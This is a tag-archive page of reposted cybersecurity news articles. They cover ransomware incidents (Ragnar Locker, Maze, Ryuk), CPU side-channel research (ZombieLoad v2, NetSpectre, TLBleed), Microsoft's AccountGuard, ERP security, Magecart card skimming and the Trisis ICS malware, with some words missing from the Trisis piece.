Tag Archives: attack

Ragnar Locker ransomware attack hides inside virtual machine

Threat actors developed a new type of ransomware attack that uses virtual machines, Sophos revealed Thursday in a blog post.

Sophos researchers recently detected a Ragnar Locker ransomware attack that “takes defense evasion to a new level.” According to the post, the ransomware variant was deployed inside a Windows XP virtual machine in order to hide the malicious code from antimalware detection. The virtual machine includes an old version of the Sun xVM VirtualBox, which is a free, open source hypervisor that was acquired by Oracle when it acquired Sun Microsystems in 2010.

“In the detected attack, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server,” Mark Loman, Sophos’ director of engineering for threat mitigation, wrote in the post.

The MSI package contained Sun xVM VirtualBox version 3.0.4, which was released August of 2009, and “an image of a stripped-down version of the Windows XP SP3 operating system, called MicroXP v0.82.” In that image is a 49 KB Ragnar Locker executable file.

“Since the vrun.exe ransomware application runs inside the virtual guest machine, its process and behaviors can run unhindered, because they’re out of reach for security software on the physical host machine,” Loman wrote.

This was the first time Sophos has seen virtual machines used for ransomware attacks, Loman said.

It’s unclear how many organizations were affected by this recent attack and how widespread it was. Sophos was unavailable for comment at press time. In the past, the Ragnar Locker ransomware group has targeted managed service providers and used their remote access to clients to infect more organizations.

In other Sophos news, the company published an update Thursday regarding the attacks on Sophos XG Firewalls. Threat actors used a customized Trojan Sophos calls “Asnarök” to exploit a zero-day SQL vulnerability in the firewalls, which the vendor quickly patched through a hotfix. Sophos researchers said the Asnarök attackers tried to bypass the hotfix and deploy ransomware in customer environments. However, Sophos said it took other steps to mitigate the threat beyond the hotfix, which prevented the modified attacks.

Go to Original Article

Maze ransomware gang pledges to stop attacking hospitals

The notorious Maze ransomware gang announced Wednesday that it will not attack any healthcare organizations during the COVID-19 pandemic.

The pandemic has put a strain hospitals and public health agencies in recent weeks as governments across the globe struggle to contain the spread of COVID-19, also known as the new coronavirus. Some security vendors have expressed concern that coronavirus-related threats could soon include ransomware attacks, which would have a crippling effect on healthcare and government organizations working on treatment and containment of the virus.

But at least one cybercrime outfit is pledging to refrain from such attacks, at least on healthcare organizations. The Maze ransomware gang, which last year began “shaming” victims by exfiltrating and publishing organizations’ sensitive data, promised to ” stop all activity versus all kinds of medical organizations until the stabilization of the situation with virus,” according to an announcement on its website.

BleepingComputer, which first reported the announcement, also contacted other ransomware operators about stopping attacks on healthcare and medical organizations during the pandemic. The DoppelPaymer gang also pledged to stop such attacks, though other ransomware groups such as Ryuk and Sodinokibi/REvil did not respond to Bleeping Computer’s queries.

The Maze gang’s pledge, however, says nothing about attacks on city, state or local governments or public health agencies. The Maze gang also said it will “help commercial organizations as much as possible” during the pandemic by offering “exclusive discounts” on ransoms to both current and future ransomware victims; the cybercriminals said they will provide decryptors and deleted any data published on its website.

A screenshot of the Maze ransomware gang's announcement that it will not attack healthcare organizations during the coronavirus pandemic.
A screenshot of the Maze ransomware gang’s announcement that it will not attack healthcare organizations during the coronavirus pandemic.

Despite the promises of the DoppelPaymer and Maze ransomware gangs, it’s unclear how much control they have over what organizations are attacked. Many outfits use a ransomware-as-a-service model where they develop the malicious code and then sell it to other cybercriminals, which are often called affiliates.

These affiliates then conduct the actual intrusions, data exfiltration and ransomware deployment and pay the authors. Many ransomware incidents are initiated through phishing emails and brute-force attacks on remote desktop protocol instances; threat researchers have said it’s likely that ransomware actors aren’t specifically targeting organizations by name or industry and are merely capitalizing on the most vulnerable networks.

Go to Original Article

Recent ransomware attack cripples nursing homes, acute care facilities

A recent ransomware attack has affected roughly 110 nursing homes and acute care facilities in 45 states, cutting caretakers off from patient records.

Virtual Care Provider Inc. (VCPI), a Milwaukee-based IT consulting, security and management service company, first became aware of the attack Nov. 17. In a letter to clients, VCPI said the business was attacked with Ryuk encryption ransomware, which is used to target large software systems, and that it was spread by the TrickBot virus, a malicious program that targets Windows machines.

The company estimated 20% of its servers have been affected by the attack, and that roughly 100 physical servers will need to be rebuilt. VCPI said it is using a virus-specific software application to scan individual Microsoft Windows servers to verify they aren’t infected. If the server is infected, the business plans to restore it. The company maintains roughly 80,000 computers and servers for the affected facilities, according to KrebsOnSecurity, which broke the story.  

Attackers are demanding $14 million in Bitcoin as ransom for a digital key that VCPI could use to unlock access to its files, a price the company doesn’t want to pay, according to KrebsOnSecurity. VCPI CEO and owner Karen Christianson said in an interview with the security news site that the attack affected nearly all of its offerings, including email and internet service, client billing and phone systems, and access to patient records. She said the ongoing attack is keeping care facilities from accessing patient records.

Experts said the incident shows even the best organizations with the best procedures and controls can fall victim to attack, providing a stark warning to healthcare CIOs to educate employees on best cybersecurity practices.

Ransomware’s impact on healthcare

Larry Ponemon, founder of data protection research company Ponemon Institute in Traverse City, Mich., described the recent ransomware attack as especially devastating.

Larry PonemonLarry Ponemon

“It’s very serious because it’s not just about losing some data or preventing people from accessing their data,” he said. “It’s about the ability to provide services that can be life and death.”

If a ransom isn’t paid to retrieve a digital key to unlock the files, Ponemon said it can take months, or even years, for an affected healthcare organization or business to rebuild its systems after a ransomware attack.

In the letter sent by VCPI, the company said its plan is to rebuild servers and install them into newly created network segments. It is prioritizing servers that provide access to email and EHR applications. The company acknowledged it doesn’t know when clients will have access to VCPI systems again and noted that it intends to investigate if the recent ransomware attack has resulted in the acquisition of client data.

“We are working diligently, nonstop, without resource constraint, according to our documented plan, and with experienced expert leadership,” the letter stated. “We need to ensure the integrity of the new environment. We are prioritizing critical VCPI infrastructure, including Microsoft Exchange email system, and electronic health record software.”

David ChouDavid Chou

David Chou, vice president and principal analyst for Constellation Research in Cupertino, Calif., said he was struck not by the ransomware attack but by the fact that the victim is a technology company that provides technology services to healthcare organizations.

Chou said the incident highlights the importance of properly educating employees to be aware of the ways attackers will try to infiltrate an organization’s systems and to ask questions before opening external emails with potentially malicious attachments. “If you don’t, you’re going to pay the price,” he said.

Go to Original Article

ZombieLoad v2 disclosed, affects newest Intel chips

Security researchers disclosed a new version of the ZombieLoad attack and warned that Intel’s fixes for the original threat can by bypassed.

The original ZombieLoad attack — a speculative execution exploit that could allow attackers to steal sensitive data from Intel processors — was first announced May 14 as part of a set of microarchitectural data sampling (MDS) attacks that also included RIDL (Rogue In-Flight Data Load) and Fallout. According to the researchers, they first disclosed ZombieLoad v2 to Intel on April 23 with an update on May 10 to communicate that “the attacks work on Cascade Lake CPUs,” Intel’s newest line of processors. However, ZombieLoad v2 was kept under embargo until this week.

“We present a new variant of ZombieLoad that enables the attack on CPUs that include hardware mitigations against MDS in silicon. With Variant 2 (TAA), data can still be leaked on microarchitectures like Cascade Lake where other MDS attacks like RIDL or Fallout are not possible,” the researchers wrote on the ZombieLoad website. “Furthermore, we show that the software-based mitigations in combinations with microcode updates presented as countermeasures against MDS attacks are not sufficient.”

One of the ZombieLoad researchers, Moritz Lipp, PhD candidate in information security at the Graz University of Technology in Austria, told SearchSecurity  the problem with the patch for the initial MDS issues is that it “does not prevent the attack, just makes it harder. It just takes longer as the leakage rate is not that high.”

Lipp added that the team’s relationship with Intel has been improving over the past two years and the extended embargo was a direct result of ZombieLoad v2 affecting Cascade Lake processors.

In an update to the original ZombieLoad research paper, the researchers noted that the main advantage of variant two “is that it also works on machines with hardware fixes for Meltdown,” and noted that the attack requires “the Intel TSX instruction-set extension which is only available on selected CPUs since 2013,” including various Skylake, Kaby Lake, Coffee Lake, Broadwell and Cascade Lake processors.

Intel did not respond to questions regarding ZombieLoad v2 — which the company refers to as TSX Asynchronous Abort (TAA) —  or the original MDS patch, and instead directed SearchSecurity to the company’s November 2019 Intel Platform Update blog post. In that blog post, Jerry Bryant, director of communications for Intel Product Assurance and Security, admitted Intel’s MDS mitigations fell short.

“We believe that the mitigations for TAA and MDS substantively reduce the potential attack surface,” Bryant wrote. “Shortly before this disclosure, however, we confirmed the possibility that some amount of data could still be inferred through a side-channel using these techniques (for TAA, only if TSX is enabled) and will be addressed in future microcode updates.”

In an attached “deep dive,” Intel also admitted the ZombieLoad v2 attack “may expose data from either the current logical processor or from the sibling logical processor on processors with simultaneous multithreading.”

The researchers also noted that with the range of CPUs affected, the attack could be performed both on PCs as well as in the cloud.

“The attack can be mounted in virtualized environments like the cloud as well across hyperthreads, if two virtual machines are each running on one of them,” Lipp told SearchSecurity. “However, typically huge cloud providers don’t schedule virtual machines anymore.”

Chris Goettl, director of product management, security at Ivanti, told SearchSecurity that while the research is interesting, the risks of ZombieLoad are relatively low.

“In a cloud environment a vulnerability like this could allow an attacker to glean information across many companies, true, but we are talking about a needle in a field of haystacks,” Goettl said. “Threat actors have motives and they will drive toward their objectives in most cases as quickly and easily as they possibly can. There are a number of information disclosure vulnerabilities that are going to be far easier to exploit than ZombieLoad.”

Lipp confirmed that in order to ensure the leak of sensitive data an attacker would need to ensure “a victim loads specific data, for instance triggering code that loads passwords in order to authenticate a user, an attacker can leak that.”

Ultimately, Goettl said he would expect Intel to continue to be reactive with side-channel attacks like ZombieLoad until there is “a precipitating event where any of these exploits are used in a real-world attack scenario.”

“The incomplete MDS patch probably says a little about how much effort Intel is putting into resolving the vulnerabilities. They fixed exactly what they were shown was the issue, but didn’t look beyond to see if something more should be done or if that fix could also be circumvented,” Goettle said. “As long as speculative execution remains academic Intel’s approach will likely continue to be reactive rather than proactive.”

Go to Original Article

We are taking new steps against broadening threats to democracy – Microsoft on the Issues

It’s clear that democracies around the world are under attack. Foreign entities are launching cyber strikes to disrupt elections and sow discord. Unfortunately, the internet has become an avenue for some governments to steal and leak information, spread disinformation, and probe and potentially attempt to tamper with voting systems. We saw this during the United States general election in 2016, last May during the French presidential election, and now in a broadening way as Americans are preparing for the November midterm elections.

Broadening cyberthreats to both U.S. political parties make clear that the tech sector will need to do more to help protect the democratic process. Last week, Microsoft’s Digital Crimes Unit (DCU) successfully executed a court order to disrupt and transfer control of six internet domains created by a group widely associated with the Russian government and known as Strontium, or alternatively Fancy Bear or APT28. We have now used this approach 12 times in two years to shut down 84 fake websites associated with this group. Attackers want their attacks to look as realistic as possible and they therefore create websites and URLs that look like sites their targeted victims would expect to receive email from or visit. The sites involved in last week’s order fit this description.

We’re concerned that these and other attempts pose security threats to a broadening array of groups connected with both American political parties in the run-up to the 2018 elections. That’s why today we are expanding Microsoft’s Defending Democracy Program with a new initiative called Microsoft AccountGuard. This initiative will provide state-of-the-art cybersecurity protection at no extra cost to all candidates and campaign offices at the federal, state and local level, as well as think tanks and political organizations we now believe are under attack. The technology is free of charge to candidates, campaigns and related political institutions using Office 365.

As a special master appointed by a federal judge concluded in the recent court order obtained by DCU, there is “good cause” to believe that Strontium is “likely to continue” its conduct. In the face of this continuing activity, we must work on the assumption that these attacks will broaden further. An effective response will require even more work to bring people and expertise together from across governments, political parties, campaigns and the tech sector.

An expansion of political targets

Last week’s order transferred control of the six internet domains listed below from Strontium to Microsoft, preventing Strontium from using them and enabling us to more closely look for evidence of what Strontium intended to do with the domains. These six domains are listed here:

List of six internet domains that were ordered transferred from Strontium to Microsoft

Importantly, these domains show a broadening of entities targeted by Strontium’s activities. One appears to mimic the domain of the International Republican Institute, which promotes democratic principles and is led by a notable board of directors, including six Republican senators and a leading senatorial candidate. Another is similar to the domain used by the Hudson Institute, which hosts prominent discussions on topics including cybersecurity, among other important activities. Other domains appear to reference the U.S. Senate but are not specific to particular offices. To be clear, we currently have no evidence these domains were used in any successful attacks before the DCU transferred control of them, nor do we have evidence to indicate the identity of the ultimate targets of any planned attack involving these domains.

Microsoft has notified both nonprofit organizations. Both have responded quickly, and Microsoft will continue to work closely with them and other targeted organizations on countering cybersecurity threats to their systems. We’ve also been monitoring and addressing domain activity with Senate IT staff the past several months, following prior attacks we detected on the staffs of two current senators.

Despite last week’s steps, we are concerned by the continued activity targeting these and other sites and directed toward elected officials, politicians, political groups and think tanks across the political spectrum in the United States. Taken together, this pattern mirrors the type of activity we saw prior to the 2016 election in the United States and the 2017 election in France.

Our new Microsoft AccountGuard initiative

AccountGuard will provide three services that will cover both organizational and personal email accounts:

  1. Threat notification across accounts. The Microsoft Threat Intelligence Center will enable Microsoft to detect and provide notification of attacks in a unified way across both organizational and personal email systems. For political campaigns and other eligible organizations, when an attack is identified, this will provide a more comprehensive view of attacks against campaign staff. When verifiable threats are detected, Microsoft will provide personal and expedited recommendations to campaigns and campaign staff to secure their systems.
  2. Security guidance and ongoing education. Officials, campaigns and related political organizations will receive guidance to help make their networks and email systems more secure. This can include applying multi-factor authentication, installing the latest security updates and guidance for setting up systems that ensure only those people who need data and documents can access them. AccountGuard will provide updated briefings and training to address evolving cyberattack trends.
  3. Early adopter opportunities. Microsoft will provide preview releases of new security features on a par with the services offered to our large corporate and government account customers.

You can read a more complete description of Microsoft AccountGuard in today’s blog by Tom Burt, the corporate vice president who heads Microsoft’s Customer Security and Trust group.

Microsoft’s Defending Democracy Program

Since we launched Microsoft’s Defending Democracy Program in April, we have focused on four priorities: protecting campaigns from hacking, protecting voting and the electoral process, increasing political advertising transparency, and defending against disinformation campaigns. In the coming months, we will offer AccountGuard in additional countries, as we continue to invest in and evolve other aspects of the Defending Democracy Program.

Our Defending Democracy Program is an important piece of our work to protect customers and promote cyberdiplomacy around the world. While cybersecurity starts with Microsoft and other companies in the tech sector, it’s ultimately a shared responsibility with customers and governments around the world. Together with our industry partners, we’ve launched the Cybersecurity Tech Accord, now endorsed by 44 leading tech companies to protect and empower civilians online and to improve the security, stability and resilience of cyberspace. And we will continue to call for stronger adherence to existing international norms and the creation of new international laws – like a Digital Geneva Convention.

As last week’s court order and today’s AccountGuard initiative reflect, we are committed not only to stronger principles and laws but stronger action as well.

A democracy requires vigilance

In 1787, as the American constitutional convention reached its conclusion in Philadelphia, Benjamin Franklin was asked as he departed Independence Hall what type of government the delegates had created. He famously replied, “A republic, if you can keep it.”

We can only keep our democratic societies secure if candidates can run campaigns and voters can go to the polls untainted by foreign cyberattacks.

Democracy requires vigilance and at times action by citizens to protect and maintain it. No individual or company can hope to meet this imperative by itself. We all need to do our part. We’re committed to doing our part by helping to protect candidates and campaigns in preserving their voices and votes no matter what party they support.

Tags: , , ,

Report: ERP security is weak, vulnerable and under attack

ERP systems are seeing growing levels of attack for two reasons. First, many of these systems — especially in the U.S. — are now connected to the internet. Second, ERP security is hard. These systems are so complex and customized that patching is expensive, complicated and often put off. 

Windows systems are often patched within days, but users may wait years to patch some ERP systems. There are old versions of PeopleSoft and other ERP applications, for instance, that are out-of-date and connected to the internet, according to researchers at two cybersecurity firms, which jointly looked at the risks faced in ERP security.

These large corporate systems, which manage global supply chains and manufacturing operations, could be compromised and shut down by an attacker, said Juan Pablo Perez-Etchegoyen, CTO of Onapsis, a cybersecurity firm based in Boston.

“If someone manages to breach one of those [ERP] applications, they could literally stop operations for some of those big players,” Perez-Etchegoyen said in an interview. His firm, along with Digital Shadows, released a report, “ERP Applications Under Fire: How Cyberattackers Target the Crown Jewels,” which was recently cited as a must-read by the U.S. Computer Emergency Readiness Team within the Department of Homeland Security. This report looked specifically at Oracle and SAP ERP systems.

Warnings of security vulnerabilities are not new

Cybersecurity researchers have been warning for a long time that U.S. critical infrastructure is vulnerable. Much of the focus has been on power plants and other utilities. But ERP systems are managing critical infrastructure, and the report by Onapsis and Digital Shadows is seen backing up a broader worry about infrastructure risks.

“The great risk in ERP is disruption,” said Alan Paller, the founder of SANS Institute, a cybersecurity research and education organization in Bethesda, Md.

If the attackers were just interested in extortion or gaining customer data, there are easier targets, such as hospitals and e-commerce sites, Paller said. What the attackers may be doing with ERP systems is prepositioning, which can mean planting malware in a system for later use.

In other words, attackers “are not sure what they are going to do” once they get inside an ERP system, Paller said. But they would rather get inside the system now, and then try to gain access later, he said.

The report by Onapsis and Digital Shadows found an increase among hackers in ERP-specific vulnerabilities. This interest has been tracked on a variety of sources, including the dark web, which is a part of the internet accessible only through special networks.

Complexity makes ERP security difficult

The complexity of ERP applications makes it really hard and really costly to apply patches.
Juan Pablo Perez-EtchegoyenCTO, Onapsis

The problem facing ERP security, Perez-Etchegoyen said, is “the complexity of ERP applications makes it really hard and really costly to apply patches. That’s why some organizations are lagging behind.”

SAP and Oracle, in emailed responses to the report, both said something similar: Customers need to stay up-to-date on patches.

“Our recommendation to all of our customers is to implement SAP security patches as soon as they are available — typically on the second Tuesday of every month — to protect SAP infrastructure from attacks,” SAP said.

Oracle pointed out that it “issued security updates for the vulnerabilities listed in this report in July and in October of last year. The Critical Patch Update is the primary mechanism for the release of all security bug fixes for Oracle products. Oracle continues to investigate means to make applying security patches as easy as possible for customers.”

One of the problems is knowing the intent of the attackers, and the report cited a full range of motives, including cyberespionage, which is sabotage by a variety of groups, from hacktivists to foreign countries.

Next wave of attacks could be destructive

But one fear is the next wave of major attacks will attempt to destroy or cause real damage to systems and operations.

This concern was something Edward Amoroso, retired senior vice president and CSO of AT&T, warned about.

In a widely cited open letter in November 2017 to then-President-elect Donald Trump, Amoroso said attacks “will shift from the theft of intellectual property to destructive attacks aimed at disrupting our ability to live as free American citizens.” The ERP security report’s findings were consistent with his earlier warning, he said in an email.

Foreign countries know that “companies like SAP, Oracle and the like are natural targets to get info on American business,” Amoroso said. “All ERP companies understand this risk, of course, and tend to have good IT security departments. But going up against military actors is tough.”

Amoroso’s point about the risk of a destructive attack was specifically cited and backed by a subsequent MIT report, “Keeping America Safe: Toward More Secure Networks for Critical Sectors.”  The MIT report warned that attackers enjoy “inherent advantages owing to human fallibility, architectural flaws in the internet and the devices connected to it.”

NetSpectre is a remote side-channel attack, but a slow one

Researchers developed a new proof-of-concept attack on Spectre variant 1 that can be performed remotely, but despite the novel aspects of the exploit, experts questioned the real-world impact.

Michael Schwarz, Moritz Lipp, Martin Schwarzl and Daniel Gruss, researchers at the Graz University of Technology in Austria, dubbed their attack “NetSpectre” and claim it is the first remote exploit against Spectre v1 and requires “no attacker-controlled code on the target device.”

“Systems containing the required Spectre gadgets in an exposed network interface or API can be attacked with our generic remote Spectre attack, allowing [it] to read arbitrary memory over the network,” the researchers wrote in their paper. “The attacker only sends a series of crafted requests to the victim and measures the response time to leak a secret value from the victim’s memory.”

Gruss wrote on Twitter that Intel was given ample time to respond to the team’s disclosure of NetSpectre.

Gruss went on to criticize Intel for not designating a new Common Vulnerabilities and Exposures (CVE) number for NetSpectre, but an Intel statement explained the reason for this was because the fix is the same as Spectre v1.

“NetSpectre is an application of Bounds Check Bypass (CVE-2017-5753) and is mitigated in the same manner — through code inspection and modification of software to ensure a speculation-stopping barrier is in place where appropriate,” an Intel spokesperson wrote via email. “We provide guidance for developers in our whitepaper, ‘Analyzing Potential Bounds Check Bypass Vulnerabilities,’ which has been updated to incorporate this method. We are thankful to Michael Schwarz, Daniel Gruss, Martin Schwarzl, Moritz Lipp and Stefan Mangard of Graz University of Technology for reporting their research.”

Jake Williams, founder and CEO of Rendition Infosec, agreed with Intel’s assessment and wrote by Twitter direct message that “it makes sense that this wouldn’t get a new CVE. It’s not a new vulnerability; it’s just exploiting an existing vulnerability in a new way.”

The speed of NetSpectre

Part of the research that caught the eye of experts was the detail that when exfiltrating memory, “this NetSpectre variant is able to leak 15 bits per hour from a vulnerable target system.”

Kevin Beaumont, a security architect based in the U.K., explained on Twitter what this rate of exfiltration means.

Williams agreed and said that although the NetSpectre attack is “dangerous and interesting,” it is “not worth freaking out about.”

“The amount of traffic required to leak meaningful amounts of data is significant and likely to be noticed,” Williams wrote. “I don’t think attacks like this will get significantly faster. Honestly, the attack could leak 10 to 100 times faster and still be relatively insignificant. Further, when you are calling an API remotely and others call the same API, they’ll impact timing, reducing the reliability of the exploit.”

Gruss wrote by Twitter direct message that since an attacker can use NetSpectre to choose an arbitrary address in memory to read, the impact of the speed of the attack depends on the use case.

“Remotely breaking ASLR (address space layout randomization) within a few hours is quite nice and very practical,” Gruss wrote, adding that “leaking the entire memory is of course completely unrealistic, but this is also not what any attacker would want to do.”

Ticketmaster breach part of worldwide card-skimming campaign

The attack that caused the Ticketmaster breach of customer information last month was actually part of a widespread campaign that’s affected more than 800 e-commerce sites.

According to researchers at the threat intelligence company RiskIQ Inc., the hacking group known as Magecart has been running a digital credit card-skimming campaign that targets third-party components of e-commerce websites around the world.

At the end of June, ticket sales company Ticketmaster disclosed that it had been compromised and user credit card data had been skimmed. A report by RiskIQ researchers Yonathan Klijnsma and Jordan Herman said the Ticketmaster breach was not an isolated incident, but was instead part of the broader campaign run by the threat group Magecart.

“The target for Magecart actors was the payment information entered into forms on Ticketmaster’s various websites,” Klijnsma and Herman wrote in a blog post. “The method was hacking third-party components shared by many of the most frequented e-commerce sites in the world.”

A digital credit card skimmer, according to RiskIQ, uses scripts injected into websites to steal data entered into forms. Magecart “placed one of these digital skimmers on Ticketmaster websites through the compromise of a third-party functionality supplier known as Inbenta,” the researchers said, noting specifically that Ticketmaster’s network was not directly breached.

RiskIQ has been tracking the activities of Magecart since 2015 and said attacks by the group have been “ramping up in frequency and impact” throughout the past few years, and Ticketmaster and Inbenta are not the only organizations that have been affected by this threat.

According to Klijnsma and Herman, Inbenta’s custom JavaScript code was “wholly replaced” with card skimmers by Magecart.

“In the use of third-party JavaScript libraries, whether a customized module or not, it may be expected that configuration options are available to modify the generated JavaScript. However, the entire replacement of the script in question is generally beyond what one would expect to see,” they wrote.

RiskIQ also noted that the command and control servers to which the skimmed data is sent has been active since 2016, though that doesn’t mean the Ticketmaster websites were affected the entire time.

The Ticketmaster breach is just “the tip of the iceberg” according to Klijnsma and Herman.

“The Ticketmaster incident received quite a lot of publicity and attention, but the Magecart problem extends to e-commerce sites well beyond Ticketmaster, and we believe it’s cause for far greater concern,” they wrote. “We’ve identified over 800 victim websites from Magecart’s main campaigns making it likely bigger than any other credit card breach to date.”

In other news:

  • The U.K.’s Information Commissioner’s Office (ICO) is fining Facebook £500,000 — more than $600,000 — for failing to protect its users’ data from misuse by Cambridge Analytica. The ICO is also going to bring criminal charges against the parent company of Cambridge Analytica, which gathered the data of millions of Americans before the 2016 presidential election. The ICO has been investigating data privacy abuses like the one by Cambridge Analytica — which has since gone out of business — and its investigations will continue. The fine brought against Facebook is reportedly the largest ever issued by the ICO and the maximum amount allowed under the U.K.’s Data Protection Act.
  • Apple will roll out USB Restricted Mode as part of the new version of iOS 11.4.1. USB Restricted Mode prevents iOS devices that have been locked for over an hour from connecting with USB devices that plug into the Lightning port. “If you don’t first unlock your password-protected iOS device — or you haven’t unlocked and connected it to a USB accessory within the past hour — your iOS device won’t communicate with the accessory or computer, and, in some cases, it might not charge,” Apple explained. Apple hasn’t provided the reason for this feature, but it will make it more difficult for forensics analysts and law enforcement to access data on locked devices.
  • Security researcher Troy Hunt discovered an online credential stuffing list that contained 111 million compromised records. The records included email addresses and passwords that were stored on a web server in France. The data set Hunt looked at had a folder called “USA” — though it has not been confirmed whether or not all the data came from Americans — and the files had dates starting in early April 2018. “That one file alone had millions of records in it and due to the nature of password reuse, hundreds of thousands of those, at least, will unlock all sorts of other accounts belonging to the email addresses involved,” Hunt said. The site with this information has been taken down, so it’s no longer accessible. Hunt also said there’s no way to know which websites leaked the credentials and suggests users implement password managers and make their passwords stronger and more unique.

TLBleed attack can extract signing keys, but exploit is difficult

An interesting, new side-channel attack abuses the Hyper-Threading feature of Intel chips and can extract signing keys with near-perfect accuracy. But both the researchers and Intel downplayed the danger of the exploit.

Ben Gras, Kaveh Razavi, Herbert Bos and Cristiano Giuffrida, researchers at Vrije Universiteit’s systems and network security group in Amsterdam, said their attack, called TLBleed, takes advantage of the translation lookaside buffer cache of Intel chips. If exploited, TLBleed can allow an attacker to extract the secret 256-bit key used to sign programs, with a success rate of 99.8% on Intel Skylake and Coffee Lake processors and 98.2% accuracy on Broadwell Xeon chips.

However, Gras tweeted that users shouldn’t be too scared of TLBleed, because while it is “a cool attack, TLBleed is not the new Spectre.”

“The OpenBSD [Hyper-Threading] disable has generated interest in TLBleed,” Gras wrote on Twitter. “TLBleed is a new side-channel in that it shows that (a) cache side-channel protection isn’t enough: TLB still leaks information; (b) side-channel safe code that is constant only in the control flow and time but not data flow is unsafe; (c) coarse-grained access patterns leak more than was previously thought.”

Justin Jett, director of audit and compliance for Plixer LLC, a network traffic analysis company based in Kennebunk, Maine, said TLBleed is “fairly dangerous, given that the flaw allows for applications to gain access to sensitive memory information from other applications.” But he noted that exploiting the issue would prove challenging.

“The execution is fairly difficult, because a malicious actor would need to infect a machine that has an application installed that they want to exploit. Once the machine is infected, the malware would need to know when the application was executing code to be able to know which memory block the sensitive information is being stored in. Only then will the malware be able to attempt to retrieve the data,” Jett wrote via email. “This is particularly concerning for applications that generate encryption keys, because the level of security that the application is trying to create could effectively be reduced to zero if an attacker is able to decipher the private key.”

Intel also downplayed the dangers associated with TLBleed; the company has not assigned a CVE number and will not patch it.

“TLBleed uses the translation lookaside buffer, a cache common to many high-performance microprocessors that stores recent address translations from virtual memory to physical memory. Software or software libraries such as Intel Integrated Performance Primitives Cryptography version U3.1 — written to ensure constant execution time and data independent cache traces should be immune to TLBleed,” Intel wrote in a statement via email. “Protecting our customers’ data and ensuring the security of our products is a top priority for Intel, and we will continue to work with customers, partners and researchers to understand and mitigate any vulnerabilities that are identified.”

Jett noted that even if Intel isn’t planning a patch, it should do more to alert customers to the dangers of TLBleed.

“Intel’s decision to not release a CVE number is odd at best. While Intel doesn’t plan to patch the vulnerability, a CVE number should have been requested so that organizations could be updated on the vulnerability and software developers would know to write their software in a way that may avoid exploitation,” Jett wrote. “Without a CVE number, many organizations will remain unaware of the flaw.”

The researchers plan to release the full paper this week. And, in August, Gras will present on the topic at Black Hat 2018 in Las Vegas.

Trisis ICS malware was publicly available after attack

The malware used in an industrial control system attack in December has been found circulating publicly on the internet after being copied from an online database.


industrial control system (ICS) malware was first disclosed by FireEye’s Mandiant threat research team on Dec. 14,

after an attack on an unknown organization. The malware specifically targeted the Triconex Safety Instrumented System (SIS) controllers made by Schneider Electric and has been called either Triton or

because of this. One week after the initial reveal by Mandiant, Schneider Electric reportedly posted a file containing sensitive pieces of the

malware framework to VirusTotal — an antivirus scan database owned by Google — on Dec. 22nd.

Cyberscoop, which first reported the story, said Schneider Electric quickly received a notice to remove the file from VirusTotal, but before the file could be removed it had already been copied and reposted to other code repositories like GitHub and has been freely available ever since.

Although the

framework accidentally posted by Schneider Electric by itself would not be enough to recreate the ICS malware, the main

executable — Trilog.exe — had also been published.

Paul Brager Jr., technical product security leader at Baker Hughes, based in Houston, Texas, and former cybersecurity project manager focused on ICS at Booz Allen Hamilton, said “it is highly conceivable that variants of

could surface that are tailored toward control systems by Siemens, Rockwell Automation, Honeywell or other digital industrial manufacturers.” 

“Because most control environments are not homogenous, patching one series of vulnerabilities for a particular manufacturer does not necessarily lessen the exposure to the infrastructure from something like

, or a variant therein,” Brager told SearchSecurity. “What we are seeing is an effort to engage control systems not only at the constituent

but the underlying systems that seek to manage those control environments.  Just as

was written to target a specific Schneider SIS, there is nothing preventing

nation state
actors with the means and resources to refashion

to target any SIS or other ICS subsystem with vulnerabilities that can be exploited.”

Eddie Habibi, founder and CEO of PAS Global, an ICS cybersecurity company headquartered in Houston, Texas, said the problem is that “there are two speeds in ICS cybersecurity — industry speed and hacker speed.” 

“Hackers can move much more quickly than industry. 

may not patch a system for months or ever, depending on assessed risk,” Habibi told SearchSecurity. “Although this may sound ominous,

does have safeguards in place that protect reliability and safety. The problem is that hackers are learning more about these systems and how to manipulate them as we saw in the


Bryan Singer, director of industrial cybersecurity services at IOActive, the cybersecurity company headquartered in Seattle, Wash., said the threat of

being repurposed may not have sunk in with organizations.

“Wake up calls haven’t woke anybody up. In watershed moments such as Equifax, Target

Triconex, everyone freaks out but doesn’t do anything,” Singer told SearchSecurity. “We’ll see a lot of the same here — people like to dismiss the threat and think it won’t happen because they’re not being targeted. IT proves this completely untrue. There are far too many attack mechanisms to say it won’t happen to us.”

ICS patching issues

Experts noted that if organizations don’t fully recognize the threat, it may be even more difficult to harden security because of the inherent differences in patching ICS.

Brager noted that patching in ICS environments can be especially tricky since “many of the components, applications, and services are proprietary and highly interdependent.”

“Because of the critical process potential of ICS systems and their components, significant testing is usually required to ensure that an applied patch yields an expected outcome and does not interfere with, or degrade in any fashion, the operations of the control system,” Brager said. “This requirement and diligence typically

out the patching cycle within [operational technology (OT)] environments, often months, and ultimately depends on the ability to patch and the resource availability to do so.”

Emily Miller, ‎director of national security and critical infrastructure programs at Mocana, and formerly the chief of process management for the DHS ICS Cyber Emergency Response Team, said the flaws that allowed the

attack were not an inherent vulnerability in the device, but “due to poor cyber hygiene.”

“In operational

patching is tricky business — remember, in OT we’re talking about devices that control physical processes that can impact lives, not just bits

bytes of data,” Miller told SearchSecurity. “Quickly patching devices, as you would expect to see in an IT environment, can have real, catastrophic consequences in an operational environment.”

ICS defense

Brager said that traditionally ICS systems are kept isolated from external networks but growing interconnectivity is making security more difficult.

“For many years, ICS environments were largely thought to be physically and logically isolated from other networks and/or environments. Connectivity was largely a function of interconnected buses and

short run
links that allowed communication through a closed loop architecture,” Brager said. “Network enablement of components within ICS expanded the threat landscape exponentially, as systems that were not originally designed to be internet/network facing, suddenly were — and the facilities needed to patch these devices were largely immature and arduous.

Habibi agreed that isolating ICS is no longer a sufficient security strategy.

“After years of reconnaissance, the bad guys have shown they can penetrate those defensive layers, bridge the illusory air gap, and take deliberate control over

. CRASHOVERRIDE did not need a vulnerability to bring down power in

the Ukraine
— only ICS and process knowledge that had been built over time,” Habibi said. “A successful

-like attack, under certain circumstances, can lead to a catastrophic accident. Consider a scenario where a skilled malicious attacker breaches a Triconex system, which is designed to safely shut down a reactor in a fluid catalytic cracking unit in a refinery, by bypassing the trip function. This simple change could act as a time bomb and remove the failsafe that ultimately protects the plant from a catastrophic event.”

Miller said the

attack is “more evidence that we need to start approaching this problem differently.” 

